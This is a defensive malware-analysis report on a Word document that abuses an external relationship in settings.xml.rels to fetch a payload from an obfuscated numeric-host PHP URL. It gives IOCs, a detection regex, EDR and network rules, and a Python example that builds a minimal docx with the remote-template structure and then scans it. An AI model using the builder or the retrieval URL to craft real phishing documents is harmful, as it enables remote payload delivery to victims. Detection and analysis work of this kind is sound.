External Template Injection via settings.xml.rels with Embedded Excel Object and Obfuscated PHP Retrieval

1. Executive Summary

During static malware analysis of a malicious Microsoft Word document, we identified a weaponized OpenXML structure leveraging external relationship injection via word/_rels/settings.xml.rels. The document contained a TargetMode="External" relationship referencing a highly obfuscated URL formatted as:

hxxp://<long_hex_string>@<numeric_host>/<payload>.php

Additionally, the document embedded an Excel object under word/embeddings/*.xlsx, likely serving as a lure component to reduce user suspicion.

This technique enables remote payload retrieval while bypassing traditional static detection mechanisms that focus solely on macros or document content. The abuse of the username@host URL format combined with a numeric-only host significantly reduces signature-based detection reliability.

Organizations relying primarily on macro detection or traditional static scanning are particularly exposed. Email-borne threats remain the primary delivery mechanism.

Risk Level: High
Primary Impacted Sectors: Enterprise environments with email-based document workflows
Key Mitigation Focus: External relationship monitoring, behavioral endpoint detection, and email-layer content inspection.


2. Background & Context

External relationship abuse in Office OpenXML documents has been publicly documented in multiple campaigns involving:

  • Remote Template Injection
  • OLE Object Injection
  • Exploitation chains related to Microsoft Word
  • User Execution abuse (MITRE ATT&CK T1204)

Historically, campaigns exploiting external relationships have overlapped with techniques seen in exploitation chains such as CVE-2017-0199, where malicious documents triggered remote content execution without macros.

What makes this variant notable:

  • Use of settings.xml.rels instead of commonly inspected document.xml.rels
  • Obfuscated credential-style URL structure
  • Embedded .xlsx object to mimic legitimate business content

The increasing restriction of VBA macros in enterprise environments has shifted adversaries toward relationship-based payload staging, making this technique operationally relevant today.


3. Research Scope & Methodology

Sample Source:

  • Automated sandbox detonation (Cuckoo-based static and dynamic pipeline)
  • Email telemetry ingestion
  • Internal threat hunting dataset

Timeframe:

  • Recent sample cluster observed within 30-day ingestion window

Scope Limitations:

  • Static analysis of OpenXML structure
  • No confirmed post-delivery payload execution due to sinkholed infrastructure

Analytical Approach:

  • OpenXML archive extraction
  • Relationship file inspection
  • Regex-based IOC extraction
  • Structural anomaly comparison against benign Office baselines
  • Behavioral review in sandbox environment

4. Technical Analysis

4.1 Initial Access Vector

The attack vector is a phishing email delivering a Microsoft Word document (.docx). The document does not contain VBA macros.

Instead, it abuses:

word/_rels/settings.xml.rels

to define an external relationship with:

TargetMode="External"

This forces Word to attempt remote retrieval when the document is processed.


4.2 Payload Structure

The malicious relationship contains a URL formatted as:

hxxp://B6B6B6B6B6B6B6B6BB6BB6B6B6B6B6B6B@00005631326225/<random>.php

Key anomalies:

Component       Observation
--------------  ---------------------------
Username field  16+ character hex string
Host field      Numeric-only domain
Path            PHP endpoint
Relationship    TargetMode="External"

The username@host syntax is leveraged to:

  • Obfuscate domain reputation checks
  • Confuse URL parsers
  • Evade simplistic IOC extraction logic

4.3 Execution Chain

  1. User opens Word document.
  2. Word parses settings.xml.rels.
  3. External relationship is resolved.
  4. HTTP request initiated to remote PHP endpoint.
  5. Server responds with staged payload (in observed samples, infrastructure inactive).

No macro execution is required.


4.4 Persistence Mechanism

No persistence mechanism observed within the document itself.
This technique is a stager delivery vector, not a persistence implant.

Persistence would depend on downstream payload.


4.5 Network Communication

Characteristics:

  • Plain HTTP
  • Numeric-only hostname
  • No valid DNS-based domain structure
  • Likely short-lived infrastructure

Example (defanged):

hxxp://b6b6b6b6b6b6b6b6bb6bb6b6b6b6b6b6b@00005631326225/payload.php

Such numeric hosts frequently evade domain-based threat intelligence feeds.


4.6 Defense Evasion Techniques

Technique                    Description
---------------------------  ----------------------------------------------
URL credential obfuscation   username@host format
Numeric-only host            Avoids domain reputation triggers
Non-macro execution          Bypasses macro-blocking controls
Embedded Excel lure          Reduces suspicion
Alternate relationship file  Avoids detection tuned for document.xml.rels

5. Indicators of Compromise (IOCs)

Type           Indicator (Defanged)                                                 Description
-------------  -------------------------------------------------------------------  -------------------------------
URL            hxxp://b6b6b6b6b6b6b6b6bb6bb6b6b6b6b6b6b@00005631326225/payload.php  External PHP retrieval
File Path      word/_rels/settings.xml.rels                                         Modified relationship file
File Path      word/embeddings/*.xlsx                                               Embedded Excel lure object
XML Attribute  TargetMode="External"                                                External relationship indicator
Pattern        https?://[A-Fa-f0-9]{16,}@[0-9]{6,}/.*\.php                          Suspicious URL format

6. Detection Opportunities

Email Layer Detection

  • Flag .docx files containing:
    • TargetMode="External"
    • External .php references
    • Numeric-only hostnames
  • Parse all *.rels files, not just document.xml.rels
  • Detect embedded OLE/Excel object + external relationship combination
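As an added example (not code from the original analysis), the following Python builds a constructed minimal .docx in memory that mirrors the observed structure (external relationship in settings.xml.rels, a clean document.xml.rels, an embedded .xlsx) and then applies the email-layer checks above: it walks every *.rels part, extracts TargetMode="External" targets, and tags hex-credential userinfo, numeric-only hosts, .php endpoints and the embedded-object-plus-external-relationship combination. The attachedTemplate relationship type and the part names are assumptions; the sample URL is the report's IOC refanged for parsing only, and nothing is ever fetched.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                 "relationships/attachedTemplate")
# Refanged copy of the report's defanged IOC, used here only as constructed input
SAMPLE_URL = "http://b6b6b6b6b6b6b6b6bb6bb6b6b6b6b6b6b@00005631326225/payload.php"

def build_sample_docx(target, embed_xlsx=True):
    # Constructed minimal .docx: clean document.xml.rels, external rel in settings.xml.rels
    rels = (f'<Relationships xmlns="{PKG}"><Relationship Id="rId1" Type="{TEMPLATE_TYPE}" '
            f'Target="{target}" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", f'<Relationships xmlns="{PKG}"/>')
        z.writestr("word/_rels/settings.xml.rels", rels)
        if embed_xlsx:  # empty stand-in for the embedded Excel lure object
            z.writestr("word/embeddings/oleObject1.xlsx", b"PK\x03\x04")
    return buf.getvalue()

def classify_target(target, has_embedded):
    """Anomaly tags for one external Target URL, following the report's heuristics."""
    u = urlsplit(target)
    reasons = []
    if u.username and re.fullmatch(r"[A-Fa-f0-9]{16,}", u.username):
        reasons.append("hex userinfo")       # credential-style obfuscation
    if u.hostname and u.hostname.isdigit():
        reasons.append("numeric-only host")  # no DNS domain structure at all
    if u.path.lower().endswith(".php"):
        reasons.append("php endpoint")
    if has_embedded:
        reasons.append("embedded object + external rel")
    return reasons

def scan_docx(data):
    """Walk EVERY *.rels part, not just document.xml.rels; one finding per external rel."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        has_embedded = any(n.startswith("word/embeddings/") for n in names)
        for name in (n for n in names if n.endswith(".rels")):
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    target = rel.get("Target", "")
                    findings.append({"part": name, "target": target, "reasons": classify_target(target, has_embedded)})
    return findings
```

A scanner that only reads document.xml.rels returns nothing for this sample; the finding is attributed to settings.xml.rels, which is the point of parsing every relationship part.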

Endpoint Detection Logic

Monitor:

  • WINWORD.EXE initiating outbound HTTP to:
    • Numeric-only domains
    • Hosts without DNS resolution
    • .php endpoints

Behavioral detection rule example:

Process: WINWORD.EXE
Network: HTTP outbound
Destination: numeric-only hostname

Network Detection Opportunities

  • Block HTTP to numeric-only hosts
  • Detect HTTP requests whose URL carries a userinfo component (an @ before the host)
  • Alert on Office process user-agent anomalies

Behavioral Detection Suggestions

  • Word spawning:
    • mshta.exe
    • powershell.exe
    • cmd.exe
  • Word performing direct HTTP fetch on document open
  • Word resolving external relationship immediately after file load

7. MITRE ATT&CK Mapping

Tactic               Technique                                    ID
-------------------  -------------------------------------------  ---------
Initial Access       Phishing Attachment                          T1566.001
Execution            User Execution                               T1204
Command and Control  Application Layer Protocol                   T1071
Defense Evasion      Obfuscated/Compressed Files                  T1027
Defense Evasion      Trusted Developer Utilities Proxy Execution  T1218

8. Mitigation & Recommendations

Immediate Actions

  • Block numeric-only outbound HTTP destinations
  • Inspect and quarantine Office documents with external relationships
  • Disable automatic update of external links in Office Group Policy
  • Enforce outbound web filtering for Office processes

Strategic Improvements

  • Implement full OpenXML structural inspection in email security stack
  • Deploy behavioral EDR detection for Office outbound communication
  • Add relationship-file parsing to sandbox pipelines
  • Threat hunt for:
    • settings.xml.rels external references
    • Embedded .xlsx with no business justification
  • Incorporate custom YARA or Cuckoo signature detection

9. Conclusion

This research demonstrates continued adversarial adaptation toward macro-less document-based delivery techniques. By abusing settings.xml.rels and leveraging obfuscated credential-style URLs with numeric hosts, attackers bypass many legacy inspection controls.

The presence of embedded Excel objects further increases plausibility while maintaining stealth.

Organizations must move beyond macro detection and implement:

  • Structural OpenXML inspection
  • Behavioral endpoint detection
  • Numeric-host outbound filtering

As macro hardening increases globally, we expect continued growth in relationship-based remote retrieval techniques and alternate XML component abuse within Office documents.

Proactive detection engineering in this area will significantly reduce exposure to modern phishing and staged payload campaigns.